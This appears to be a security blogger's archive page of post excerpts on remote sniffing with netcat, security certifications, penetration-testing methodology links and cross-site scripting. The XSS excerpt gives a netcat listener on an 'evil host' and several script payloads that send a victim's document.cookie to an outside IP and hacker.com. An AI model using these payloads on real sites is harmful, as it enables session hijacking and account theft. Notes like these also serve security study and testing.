Author Archives: fsormok

Remote sniffing with Wireshark and netcat

The problem: You would like to sniff your firewall. The problem is that the firewall is (of course) a headless Linux box without a GUI. After half an hour you'll get a headache from staring at the characters fly by the … Continue reading

Posted in Security

Certifications

OPSA – OSSTMM Professional Security Analyst
OPST – OSSTMM Professional Security Tester
SSCP – Systems Security Certified Practitioner
CISSP – Certified Information Systems Security Professional
CEH – Certified Ethical Hacker Certificate
CHFI – Computer Hacking Forensic Investigator
LPT – Licensed … Continue reading

Posted in Security

Penetration Testing Methodologies

OWASP (Open Web Application Security Project): http://www.owasp.org/
OSSTMM (Open Source Security Testing Methodology Manual): http://www.osstmm.org
The NIST SP 800-42 at: http://csrc.nist.gov/publications/nistpubs/800-42/NIST-SP800-42.pdf
The CISSP and SSCP Open Study Guides Web Site: http://www.cccure.org
The Professional Security Testers Warehouse: http://www.professionalsecuritytesters.org

Posted in Security

XSS (Cross Site Scripting)

listener on evil host:

    nc -l -p 80

example script on attacked server:

    <script>alert(document.cookie)</script>

Example 1

    <script>document.write('<img src=http://195.225.45.220/' + document.cookie + '>')</script>

Example 2

    <script>(new Image).src="http://195.225.45.220/c.php?c=" + escape(document.cookie)</script>

Example 3

    <script>(new Image).src='http://www.hacker.com/' … Continue reading

Posted in Security